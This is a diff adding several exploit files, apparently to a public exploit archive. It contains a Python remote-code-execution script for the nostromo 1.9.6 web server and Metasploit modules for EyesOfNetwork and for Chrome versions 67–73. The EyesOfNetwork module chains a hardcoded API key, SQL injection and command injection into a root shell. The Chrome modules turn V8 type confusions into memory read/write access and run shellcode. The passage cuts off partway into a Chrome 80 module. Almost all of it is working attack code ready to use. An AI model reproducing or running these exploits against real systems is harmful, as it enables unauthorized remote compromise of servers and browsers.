@@ -0,0 +1,70 @@
+# Exploit Title: nostromo 1.9.6 - Remote Code Execution
+# Date: 2019-12-31
+# Exploit Author: Kr0ff
+# Vendor Homepage:
+# Software Link: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz
+# Version: 1.9.6
+# Tested on: Debian
+# CVE : CVE-2019-16278
+
+cve2019_16278.py
+
+#!/usr/bin/env python
+
+import sys
+import socket
+
+art = """
+
+                                        _____-2019-16278
+        _____  _______    ______   _____\    \   
+   _____\    \_\      |  |      | /    / |    |  
+  /     /|     ||     /  /     /|/    /  /___/|  
+ /     / /____/||\    \  \    |/|    |__ |___|/  
+|     | |____|/ \ \    \ |    | |       \        
+|     |  _____   \|     \|    | |     __/ __     
+|\     \|\    \   |\         /| |\    \  /  \    
+| \_____\|    |   | \_______/ | | \____\/    |   
+| |     /____/|    \ |     | /  | |    |____/|   
+ \|_____|    ||     \|_____|/    \|____|   | |   
+        |____|/                        |___|/    
+
+
+
+"""
+
+help_menu = '\r\nUsage: cve2019-16278.py <Target_IP> <Target_Port> <Command>'
+
+def connect(soc):
+    response = ""
+    try:
+        while True:
+            connection = soc.recv(1024)
+            if len(connection) == 0:
+                break
+            response += connection
+    except:
+        pass
+    return response
+
+def cve(target, port, cmd):
+    soc = socket.socket()
+    soc.connect((target, int(port)))
+    payload = 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1'.format(cmd)
+    soc.send(payload)
+    receive = connect(soc)
+    print(receive)
+
+if __name__ == "__main__":
+
+    print(art)
+    
+    try:
+        target = sys.argv[1]
+        port = sys.argv[2]
+        cmd = sys.argv[3]
+
+        cve(target, port, cmd)
+   
+    except IndexError:
+        print(help_menu)
\ No newline at end of file
diff --git a/exploits/multiple/remote/48169.rb b/exploits/multiple/remote/48169.rb
new file mode 100755
index 000000000..b98093f2d
--- /dev/null
+++ b/exploits/multiple/remote/48169.rb
@@ -0,0 +1,327 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'EyesOfNetwork AutoDiscovery Target Command Execution',
+      'Description'     => %q{
+        This module exploits multiple vulnerabilities in EyesOfNetwork version 5.3
+        and prior in order to execute arbitrary commands as root.
+
+        This module takes advantage of a command injection vulnerability in the
+        `target` parameter of the AutoDiscovery functionality within the EON web
+        interface in order to write an Nmap NSE script containing the payload to
+        disk. It then starts an Nmap scan to activate the payload. This results in
+        privilege escalation because the`apache` user can execute Nmap as root.
+
+        Valid credentials for a user with administrative privileges are required.
+        However, this module can bypass authentication via two methods, i.e. by
+        generating an API access token based on a hardcoded key, and via SQLI.
+        This module has been successfully tested on EyesOfNetwork 5.3 with API
+        version 2.4.2.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Clément Billac', # @h4knet - Discovery and exploit
+          'bcoles',         # Metasploit
+          'Erik Wynter'     # @wyntererik - Metasploit
+        ],
+      'References'      =>
+        [
+          ['CVE', '2020-8654'], # authenticated rce
+          ['CVE', '2020-8655'], # nmap privesc
+          ['CVE', '2020-8656'], # sqli auth bypass
+          ['CVE', '2020-8657'], # hardcoded API key
+          ['EDB', '48025']
+        ],
+      'Platform'        => %w[unix linux],
+      'Arch'            => ARCH_CMD,
+      'Targets'         => [['Auto', { }]],
+      'Privileged'      => true,
+      'DisclosureDate'  => '2020-02-06',
+      'DefaultOptions'  => {
+        'RPORT' => 443,
+        'SSL'     => true, #HTTPS is required for the module to work
+        'PAYLOAD' => 'generic/shell_reverse_tcp'
+        },
+      'DefaultTarget'   => 0))
+    register_options [
+      OptString.new('TARGETURI', [true, 'Base path to EyesOfNetwork', '/']),
+      OptString.new('SERVER_ADDR', [true, 'EyesOfNetwork server IP address (if different from RHOST)', '']),
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit',  [false, 'Override check result', false])
+    ]
+  end
+
+  def nmap_path
+    '/usr/bin/nmap'
+  end
+
+  def server_addr
+    datastore['SERVER_ADDR'].blank? ? rhost : datastore['SERVER_ADDR']
+  end
+
+  def check
+    vprint_status("Running check")
+    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, '/eonapi/getApiKey')
+
+    unless res
+      return CheckCode::Unknown('Connection failed')
+    end
+
+    unless res.code == 401 && res.body.include?('api_version')
+      return CheckCode::Safe('Target is not an EyesOfNetwork application.')
+    end
+
+    version = res.get_json_document()['api_version'] rescue ''
+
+    if version.to_s.eql? ''
+      return CheckCode::Detected('Could not determine EyesOfNetwork version.')
+    end
+
+    version = Gem::Version.new version
+
+    unless version <= Gem::Version.new('2.4.2')
+      return CheckCode::Safe("Target is EyesOfNetwork with API version #{version}.")
+    end
+
+    CheckCode::Appears("Target is EyesOfNetwork with API version #{version}.")
+  end
+
+  def generate_api_key
+    default_key = "€On@piK3Y"
+    default_user_id = 1
+    key = Digest::MD5.hexdigest(default_key + default_user_id.to_s)
+    Digest::SHA256.hexdigest(key + server_addr)
+  end
+
+  def sqli_to_api_key
+    # Attempt to obtain the admin API key via SQL injection, using a fake password and its md5 encrypted hash
+    fake_pass = Rex::Text::rand_text_alpha(10)
+    fake_pass_md5 = Digest::MD5.hexdigest("#{fake_pass}")
+    user_sqli = "' union select 1,'admin','#{fake_pass_md5}',0,0,1,1,8 or '"
+    api_res = send_request_cgi({
+      'uri'       => normalize_uri(target_uri.path, "/eonapi/getApiKey"),
+      'method'    => 'GET',
+       'vars_get' => {
+        'username'   => user_sqli,
+        'password'   => fake_pass
+      }
+    })
+
+    unless api_res
+      print_error('Connection failed.')
+      return
+    end
+
+    unless api_res.code == 200 && api_res.get_json_document.include?('EONAPI_KEY')
+      print_error("SQL injection to obtain API key failed")
+      return
+    end
+
+    api_res.get_json_document()['EONAPI_KEY']
+  end
+
+  def create_eon_user(user, password)
+    vprint_status("Creating user #{user} ...")
+
+    vars_post = {
+      user_name:  user,
+      user_group: "admins",
+      user_password: password
+    }
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, '/eonapi/createEonUser'),
+      'ctype'    => 'application/json',
+      'vars_get' => {
+        'apiKey'   => @api_key,
+        'username' => @api_user
+      },
+      'data' => vars_post.to_json
+    })
+
+    unless res
+      print_warning("Failed to create user: Connection failed.")
+      return
+    end
+
+    return res
+  end
+
+  def verify_api_key(res)
+    return false unless res.code == 200
+
+    json_data = res.get_json_document
+    json_res = json_data['result']
+    return false unless json_res && json_res['description']
+    json_res = json_res['description']
+
+    return true if json_res && json_res.include?('SUCCESS')
+
+    return false
+  end
+
+  def delete_eon_user(user)
+    vprint_status "Removing user #{user} ..."
+
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, '/eonapi/deleteEonUser'),
+      'ctype'    => 'application/json',
+      'data'     => { user_name: user }.to_json,
+      'vars_get' => { apiKey: @api_key, username: @api_user }
+    })
+
+    unless res
+      print_warning 'Removing user #{user} failed: Connection failed'
+      return
+    end
+
+    res
+  end
+
+  def login(user, pass)
+    vprint_status "Authenticating as #{user} ..."
+
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, 'login.php'),
+      'vars_post' => {
+        login: user,
+        mdp: pass
+      }
+    })
+
+    unless res
+      fail_with Failure::Unreachable, 'Connection failed'
+    end
+
+    unless res.code == 200 && res.body.include?('dashboard_view')
+      fail_with Failure::NoAccess, 'Authentication failed'
+    end
+
+    print_good "Authenticated as user #{user}"
+
+    @cookie = res.get_cookies
+
+    if @cookie.empty?
+      fail_with Failure::UnexpectedReply, 'Failed to retrieve cookies'
+    end
+
+    res
+  end
+
+  def create_autodiscovery_job(cmd)
+    vprint_status "Creating AutoDiscovery job: #{cmd}"
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, '/lilac/autodiscovery.php'),
+      'cookie' => @cookie,
+      'vars_post' => {
+        'request'          => 'autodiscover',
+        'job_name'         => 'Internal discovery',
+        'job_description'  => 'Internal EON discovery procedure.',
+        'nmap_binary'      => nmap_path,
+        'default_template' => '',
+        'target[]'         => cmd
+      }
+    })
+
+    unless res
+      fail_with Failure::Unreachable, 'Creating AutoDiscovery job failed: Connection failed'
+    end
+
+    unless res.body.include? 'Starting...'
+      fail_with Failure::Unknown, 'Creating AutoDiscovery job failed: Job failed to start'
+    end
+
+    res
+  end
+
+  def delete_autodiscovery_job(job_id)
+    vprint_status "Removing AutoDiscovery job #{job_id} ..."
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, '/lilac/autodiscovery.php'),
+      'cookie' => @cookie,
+      'vars_get' => {
+        id: job_id,
+        delete: 1
+      }
+    })
+
+    unless res
+      print_warning "Removing AutoDiscovery job #{job_id} failed: Connection failed"
+      return
+    end
+    res
+  end
+
+  def execute_command(cmd, opts = {})
+    res = create_autodiscovery_job ";#{cmd} #"
+    return unless res
+
+    job_id = res.body.scan(/autodiscovery.php\?id=([\d]+)/).flatten.first
+
+    if job_id.empty?
+      print_warning 'Could not retrieve AutoDiscovery job ID. Manual removal required.'
+      return
+    end
+    delete_autodiscovery_job job_id
+  end
+
+  def cleanup
+    super
+    if @username
+      delete_eon_user @username
+    end
+  end
+
+  def exploit
+    unless [CheckCode::Detected, CheckCode::Appears].include? check
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    @api_user = 'admin'
+    @api_key = generate_api_key
+    print_status "Using generated API key: #{@api_key}"
+
+    @username = rand_text_alphanumeric(8..12)
+    @password = rand_text_alphanumeric(8..12)
+
+    create_res = create_eon_user @username, @password
+    unless verify_api_key(create_res)
+      @api_key = sqli_to_api_key
+      fail_with Failure::NoAccess, 'Failed to obtain valid API key' unless @api_key
+      print_status("Using API key obtained via SQL injection: #{@api_key}")
+      sqli_verify = create_eon_user @username, @password
+      fail_with Failure::NoAccess, 'Failed to obtain valid API with sqli' unless verify_api_key(sqli_verify)
+    end
+
+    admin_group_id = 1
+    login @username, @password
+    unless @cookie.include? 'group_id='
+      @cookie << "; group_id=#{admin_group_id}"
+    end
+
+    nse = Rex::Text.encode_base64("local os=require \"os\" hostrule=function(host) os.execute(\"#{payload.encoded.gsub(/"/, '\"')}\") end action=function() end")
+    nse_path = "/tmp/.#{rand_text_alphanumeric 8..12}"
+    cmd = "echo #{nse} | base64 -d > #{nse_path};sudo #{nmap_path} localhost -sn -script #{nse_path};rm #{nse_path}"
+    print_status "Sending payload (#{cmd.length} bytes) ..."
+    execute_command cmd
+  end
+end
\ No newline at end of file
diff --git a/exploits/multiple/remote/48183.rb b/exploits/multiple/remote/48183.rb
new file mode 100755
index 000000000..ac1d07d26
--- /dev/null
+++ b/exploits/multiple/remote/48183.rb
@@ -0,0 +1,287 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Google Chrome 72 and 73 Array.map exploit',
+      'Description'    => %q{
+        This module exploits an issue in Chrome 73.0.3683.86 (64 bit).
+      The exploit corrupts the length of a float in order to modify the backing store
+      of a typed array. The typed array can then be used to read and write arbitrary
+      memory. The exploit then uses WebAssembly in order to allocate a region of RWX
+      memory, which is then replaced with the payload.
+        The payload is executed within the sandboxed renderer process, so the browser
+      must be run with the --no-sandbox option for the payload to work correctly.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+          'dmxcsnsbh', # discovery
+          'István Kurucsai', # exploit
+          'timwr', # metasploit module
+        ],
+      'References'     => [
+          ['CVE', '2019-5825'],
+          ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=941743'],
+          ['URL', 'https://github.com/exodusintel/Chromium-941743'],
+          ['URL', 'https://blog.exodusintel.com/2019/09/09/patch-gapping-chrome/'],
+          ['URL', 'https://lordofpwn.kr/cve-2019-5825-v8-exploit/'],
+        ],
+      'Arch'           => [ ARCH_X64 ],
+      'Platform'       => ['windows','osx'],
+      'DefaultTarget'  => 0,
+      'Targets'        => [ [ 'Automatic', { } ] ],
+      'DisclosureDate' => 'Mar 7 2019'))
+    register_advanced_options([
+      OptBool.new('DEBUG_EXPLOIT', [false, "Show debug information during exploitation", false]),
+    ])
+  end
+
+  def on_request_uri(cli, request)
+
+    if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}
+      print_status("[*] #{request.body}")
+      send_response(cli, '')
+      return
+    end
+
+    print_status("Sending #{request.uri} to #{request['User-Agent']}")
+    escaped_payload = Rex::Text.to_unescape(payload.encoded)
+    jscript = %Q^
+// HELPER FUNCTIONS
+let conversion_buffer = new ArrayBuffer(8);
+let float_view = new Float64Array(conversion_buffer);
+let int_view = new BigUint64Array(conversion_buffer);
+BigInt.prototype.hex = function() {
+    return '0x' + this.toString(16);
+};
+BigInt.prototype.i2f = function() {
+    int_view[0] = this;
+    return float_view[0];
+}
+BigInt.prototype.smi2f = function() {
+    int_view[0] = this << 32n;
+    return float_view[0];
+}
+Number.prototype.f2i = function() {
+    float_view[0] = this;
+    return int_view[0];
+}
+Number.prototype.f2smi = function() {
+    float_view[0] = this;
+    return int_view[0] >> 32n;
+}
+Number.prototype.i2f = function() {
+    return BigInt(this).i2f();
+}
+Number.prototype.smi2f = function() {
+    return BigInt(this).smi2f();
+}
+
+// *******************
+// Exploit starts here
+// *******************
+// This call ensures that TurboFan won't inline array constructors.
+Array(2**30);
+
+// we are aiming for the following object layout
+// [output of Array.map][packed float array][typed array][Object]
+// First the length of the packed float array is corrupted via the original vulnerability,
+// then the float array can be used to modify the backing store of the typed array, thus achieving AARW.
+// The Object at the end is used to implement addrof
+
+// offset of the length field of the float array from the map output
+const float_array_len_offset = 23;
+// offset of the length field of the typed array
+const tarray_elements_len_offset = 24;
+// offset of the address pointer of the typed array
+const tarray_elements_addr_offset = tarray_elements_len_offset + 1;
+const obj_prop_b_offset = 33;
+
+// Set up a fast holey smi array, and generate optimized code.
+let a = [1, 2, ,,, 3];
+let cnt = 0;
+var tarray;
+var float_array;
+var obj;
+
+function mapping(a) {
+  function cb(elem, idx) {
+    if (idx == 0) {
+      float_array = [0.1, 0.2];
+
+      tarray = new BigUint64Array(2);
+      tarray[0] = 0x41414141n;
+      tarray[1] = 0x42424242n;
+      obj = {'a': 0x31323334, 'b': 1};
+      obj['b'] = obj;
+    }
+
+    if (idx > float_array_len_offset) {
+      // minimize the corruption for stability
+      throw "stop";
+    }
+    return idx;
+  }
+  return a.map(cb);
+}
+
+function get_rw() {
+  for (let i = 0; i < 10 ** 5; i++) {
+    mapping(a);
+  }
+
+  // Now lengthen the array, but ensure that it points to a non-dictionary
+  // backing store.
+  a.length = (32 * 1024 * 1024)-1;
+  a.fill(1, float_array_len_offset, float_array_len_offset+1);
+  a.fill(1, float_array_len_offset+2);
+
+  a.push(2);
+  a.length += 500;
+
+  // Now, the non-inlined array constructor should produce an array with
+  // dictionary elements: causing a crash.
+  cnt = 1;
+  try {
+    mapping(a);
+  } catch(e) {
+    // relative RW from the float array from this point on
+    let sane = sanity_check()
+    print('sanity_check == ', sane);
+    print('len+3: ' + float_array[tarray_elements_len_offset+3].f2i().toString(16));
+    print('len+4: ' + float_array[tarray_elements_len_offset+4].f2i().toString(16));
+    print('len+8: ' + float_array[tarray_elements_len_offset+8].f2i().toString(16));
+
+    let original_elements_ptr = float_array[tarray_elements_len_offset+1].f2i() - 1n;
+    print('original elements addr: ' + original_elements_ptr.toString(16));
+    print('original elements value: ' + read8(original_elements_ptr).toString(16));
+    print('addrof(Object): ' + addrof(Object).toString(16));
+  }
+}
+
+function sanity_check() {
+  success = true;
+  success &= float_array[tarray_elements_len_offset+3].f2i() == 0x41414141;
+  success &= float_array[tarray_elements_len_offset+4].f2i() == 0x42424242;
+  success &= float_array[tarray_elements_len_offset+8].f2i() == 0x3132333400000000;
+  return success;
+}
+
+function read8(addr) {
+  let original = float_array[tarray_elements_len_offset+1];
+  float_array[tarray_elements_len_offset+1] = (addr - 0x1fn).i2f();
+  let result = tarray[0];
+  float_array[tarray_elements_len_offset+1] = original;
+  return result;
+}
+
+function write8(addr, val) {
+  let original = float_array[tarray_elements_len_offset+1];
+  float_array[tarray_elements_len_offset+1] = (addr - 0x1fn).i2f();
+  tarray[0] = val;
+  float_array[tarray_elements_len_offset+1] = original;
+}
+
+function addrof(o) {
+  obj['b'] = o;
+  return float_array[obj_prop_b_offset].f2i();
+}
+
+var wfunc = null;
+var shellcode = unescape("#{escaped_payload}");
+
+function get_wasm_func() {
+  var importObject = {
+      imports: { imported_func: arg => print(arg) }
+  };
+  bc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];
+  wasm_code = new Uint8Array(bc);
+  wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject);
+  return wasm_mod.exports.exported_func;
+}
+
+function rce() {
+  let wasm_func = get_wasm_func();
+  wfunc = wasm_func;
+  // traverse the JSFunction object chain to find the RWX WebAssembly code page
+  let wasm_func_addr = addrof(wasm_func) - 1n;
+  print('wasm: ' + wasm_func_addr);
+  if (wasm_func_addr == 2) {
+    print('Failed, retrying...');
+    location.reload();
+    return;
+  }
+
+  let sfi = read8(wasm_func_addr + 12n*2n) - 1n;
+  print('sfi: ' + sfi.toString(16));
+  let WasmExportedFunctionData = read8(sfi + 4n*2n) - 1n;
+  print('WasmExportedFunctionData: ' + WasmExportedFunctionData.toString(16));
+
+  let instance = read8(WasmExportedFunctionData + 8n*2n) - 1n;
+  print('instance: ' + instance.toString(16));
+
+  //let rwx_addr = read8(instance + 0x108n);
+  let rwx_addr = read8(instance + 0xf8n) + 0n; // Chrome/73.0.3683.86
+  //let rwx_addr = read8(instance + 0xe0n) + 18n; // Chrome/69.0.3497.100
+  //let rwx_addr = read8(read8(instance - 0xc8n) + 0x53n); // Chrome/68.0.3440.84
+  print('rwx: ' + rwx_addr.toString(16));
+
+  // write the shellcode to the RWX page
+  if (shellcode.length % 2 != 0) {
+    shellcode += "\u9090";
+  }
+
+  for (let i = 0; i < shellcode.length; i += 2) {
+    write8(rwx_addr + BigInt(i*2), BigInt(shellcode.charCodeAt(i) + shellcode.charCodeAt(i + 1) * 0x10000));
+  }
+
+  // invoke the shellcode
+  wfunc();
+}
+
+
+function exploit() {
+  print("Exploiting...");
+  get_rw();
+  rce();
+}
+
+exploit();
+^
+
+    if datastore['DEBUG_EXPLOIT']
+      debugjs = %Q^
+print = function(arg) {
+  var request = new XMLHttpRequest();
+  request.open("POST", "/print", false);
+  request.send("" + arg);
+};
+^
+      jscript = "#{debugjs}#{jscript}"
+    else
+      jscript.gsub!(/\/\/.*$/, '') # strip comments
+      jscript.gsub!(/^\s*print\s*\(.*?\);\s*$/, '') # strip print(*);
+    end
+
+    html = %Q^
+<html>
+<head>
+<script>
+#{jscript}
+</script>
+</head>
+<body>
+</body>
+</html>
+    ^
+    send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})
+  end
+
+end
\ No newline at end of file
diff --git a/exploits/multiple/remote/48184.rb b/exploits/multiple/remote/48184.rb
new file mode 100755
index 000000000..69b253e8f
--- /dev/null
+++ b/exploits/multiple/remote/48184.rb
@@ -0,0 +1,301 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Google Chrome 67, 68 and 69 Object.create exploit',
+      'Description'    => %q{
+        This modules exploits a type confusion in Google Chromes JIT compiler.
+      The Object.create operation can be used to cause a type confusion between a
+      PropertyArray and a NameDictionary.
+        The payload is executed within the rwx region of the sandboxed renderer
+      process, so the browser must be run with the --no-sandbox option for the
+      payload to work.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+          'saelo', # discovery and exploit
+          'timwr', # metasploit module
+        ],
+      'References'     => [
+          ['CVE', '2018-17463'],
+          ['URL', 'http://www.phrack.org/papers/jit_exploitation.html'],
+          ['URL', 'https://ssd-disclosure.com/archives/3783/ssd-advisory-chrome-type-confusion-in-jscreateobject-operation-to-rce'],
+          ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],
+          ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=888923'],
+        ],
+      'Arch'           => [ ARCH_X64 ],
+      'Platform'       => ['windows', 'osx'],
+      'DefaultTarget'  => 0,
+      'Targets'        => [ [ 'Automatic', { } ] ],
+      'DisclosureDate' => 'Sep 25 2018'))
+    register_advanced_options([
+      OptBool.new('DEBUG_EXPLOIT', [false, "Show debug information during exploitation", false]),
+    ])
+  end
+
+  def on_request_uri(cli, request)
+
+    if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}
+      print_status("[*] " + request.body)
+      send_response(cli, '')
+      return
+    end
+
+    print_status("Sending #{request.uri} to #{request['User-Agent']}")
+
+    jscript = %Q^
+let shellcode = new Uint8Array([#{Rex::Text::to_num(payload.encoded)}]);
+
+let ab = new ArrayBuffer(8);
+let floatView = new Float64Array(ab);
+let uint64View = new BigUint64Array(ab);
+let uint8View = new Uint8Array(ab);
+
+Number.prototype.toBigInt = function toBigInt() {
+    floatView[0] = this;
+    return uint64View[0];
+};
+
+BigInt.prototype.toNumber = function toNumber() {
+    uint64View[0] = this;
+    return floatView[0];
+};
+
+function hex(n) {
+    return '0x' + n.toString(16);
+};
+
+function fail(s) {
+    print('FAIL ' + s);
+    throw null;
+}
+
+const NUM_PROPERTIES = 32;
+const MAX_ITERATIONS = 100000;
+
+function gc() {
+    for (let i = 0; i < 200; i++) {
+        new ArrayBuffer(0x100000);
+    }
+}
+
+function make(properties) {
+    let o = {inline: 42}      // TODO
+    for (let i = 0; i < NUM_PROPERTIES; i++) {
+        eval(`o.p${i} = properties[${i}];`);
+    }
+    return o;
+}
+
+function pwn() {
+    function find_overlapping_properties() {
+        let propertyNames = [];
+        for (let i = 0; i < NUM_PROPERTIES; i++) {
+            propertyNames[i] = `p${i}`;
+        }
+        eval(`
+            function vuln(o) {
+                let a = o.inline;
+                this.Object.create(o);
+                ${propertyNames.map((p) => `let ${p} = o.${p};`).join('\\n')}
+                return [${propertyNames.join(', ')}];
+            }
+        `);
+
+        let propertyValues = [];
+        for (let i = 1; i < NUM_PROPERTIES; i++) {
+            propertyValues[i] = -i;
+        }
+
+        for (let i = 0; i < MAX_ITERATIONS; i++) {
+            let r = vuln(make(propertyValues));
+            if (r[1] !== -1) {
+                for (let i = 1; i < r.length; i++) {
+                    if (i !== -r[i] && r[i] < 0 && r[i] > -NUM_PROPERTIES) {
+                        return [i, -r[i]];
+                    }
+                }
+            }
+        }
+
+        fail("Failed to find overlapping properties");
+    }
+
+    function addrof(obj) {
+        eval(`
+            function vuln(o) {
+                let a = o.inline;
+                this.Object.create(o);
+                return o.p${p1}.x1;
+            }
+        `);
+
+        let propertyValues = [];
+        propertyValues[p1] = {x1: 13.37, x2: 13.38};
+        propertyValues[p2] = {y1: obj};
+
+        let i = 0;
+        for (; i < MAX_ITERATIONS; i++) {
+            let res = vuln(make(propertyValues));
+            if (res !== 13.37)
+                return res.toBigInt()
+        }
+
+        fail("Addrof failed");
+    }
+
+    function corrupt_arraybuffer(victim, newValue) {
+        eval(`
+            function vuln(o) {
+                let a = o.inline;
+                this.Object.create(o);
+                let orig = o.p${p1}.x2;
+                o.p${p1}.x2 = ${newValue.toNumber()};
+                return orig;
+            }
+        `);
+
+        let propertyValues = [];
+        let o = {x1: 13.37, x2: 13.38};
+        propertyValues[p1] = o;
+        propertyValues[p2] = victim;
+
+        for (let i = 0; i < MAX_ITERATIONS; i++) {
+            o.x2 = 13.38;
+            let r = vuln(make(propertyValues));
+            if (r !== 13.38)
+                return r.toBigInt();
+        }
+
+        fail("Corrupt ArrayBuffer failed");
+    }
+
+    let [p1, p2] = find_overlapping_properties();
+    print(`Properties p${p1} and p${p2} overlap after conversion to dictionary mode`);
+
+    let memview_buf = new ArrayBuffer(1024);
+    let driver_buf = new ArrayBuffer(1024);
+
+    gc();
+
+    let memview_buf_addr = addrof(memview_buf);
+    memview_buf_addr--;
+    print(`ArrayBuffer @ ${hex(memview_buf_addr)}`);
+
+    let original_driver_buf_ptr = corrupt_arraybuffer(driver_buf, memview_buf_addr);
+
+    let driver = new BigUint64Array(driver_buf);
+    let original_memview_buf_ptr = driver[4];
+
+    let memory = {
+        write(addr, bytes) {
+            driver[4] = addr;
+            let memview = new Uint8Array(memview_buf);
+            memview.set(bytes);
+        },
+        read(addr, len) {
+            driver[4] = addr;
+            let memview = new Uint8Array(memview_buf);
+            return memview.subarray(0, len);
+        },
+        readPtr(addr) {
+            driver[4] = addr;
+            let memview = new BigUint64Array(memview_buf);
+            return memview[0];
+        },
+        writePtr(addr, ptr) {
+            driver[4] = addr;
+            let memview = new BigUint64Array(memview_buf);
+            memview[0] = ptr;
+        },
+        addrof(obj) {
+            memview_buf.leakMe = obj;
+            let props = this.readPtr(memview_buf_addr + 8n);
+            return this.readPtr(props + 15n) - 1n;
+        },
+    };
+
+    // Generate a RWX region for the payload
+    function get_wasm_instance() {
+      var buffer = new Uint8Array([
+        0,97,115,109,1,0,0,0,1,132,128,128,128,0,1,96,0,0,3,130,128,128,128,0,
+        1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,
+        128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,
+        101,108,108,111,0,0,10,136,128,128,128,0,1,130,128,128,128,0,0,11
+      ]);
+      return new WebAssembly.Instance(new WebAssembly.Module(buffer),{});
+    }
+
+    let wasm_instance = get_wasm_instance();
+    let wasm_addr = memory.addrof(wasm_instance);
+    print("wasm_addr @ " + hex(wasm_addr));
+    let wasm_rwx_addr = memory.readPtr(wasm_addr + 0xe0n);
+    print("wasm_rwx @ " + hex(wasm_rwx_addr));
+
+    memory.write(wasm_rwx_addr, shellcode);
+
+    let fake_vtab = new ArrayBuffer(0x80);
+    let fake_vtab_u64 = new BigUint64Array(fake_vtab);
+    let fake_vtab_addr = memory.readPtr(memory.addrof(fake_vtab) + 0x20n);
+
+    let div = document.createElement('div');
+    let div_addr = memory.addrof(div);
+    print('div_addr @ ' + hex(div_addr));
+    let el_addr = memory.readPtr(div_addr + 0x20n);
+    print('el_addr @ ' + hex(div_addr));
+
+    fake_vtab_u64.fill(wasm_rwx_addr, 6, 10);
+    memory.writePtr(el_addr, fake_vtab_addr);
+
+    print('Triggering...');
+
+    // Trigger virtual call
+    div.dispatchEvent(new Event('click'));
+
+    // We are done here, repair the corrupted array buffers
+    let addr = memory.addrof(driver_buf);
+    memory.writePtr(addr + 32n, original_driver_buf_ptr);
+    memory.writePtr(memview_buf_addr + 32n, original_memview_buf_ptr);
+}
+
+pwn();
+^
+
+    if datastore['DEBUG_EXPLOIT']
+      debugjs = %Q^
+print = function(arg) {
+  var request = new XMLHttpRequest();
+  request.open("POST", "/print", false);
+  request.send("" + arg);
+};
+^
+      jscript = "#{debugjs}#{jscript}"
+    else
+      jscript.gsub!(/\/\/.*$/, '') # strip comments
+      jscript.gsub!(/^\s*print\s*\(.*?\);\s*$/, '') # strip print(*);
+    end
+
+    html = %Q^
+<html>
+<head>
+<script>
+#{jscript}
+</script>
+</head>
+<body>
+</body>
+</html>
+^
+
+    send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})
+  end
+
+end
\ No newline at end of file
diff --git a/exploits/multiple/remote/48186.rb b/exploits/multiple/remote/48186.rb
new file mode 100755
index 000000000..545ada2e6
--- /dev/null
+++ b/exploits/multiple/remote/48186.rb
@@ -0,0 +1,382 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Google Chrome 80 JSCreate side-effect type confusion exploit',
+      'Description'    => %q{
+      This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit
+      corrupts the length of a float array (float_rel), which can then be used for out
+      of bounds read and write on adjacent memory.
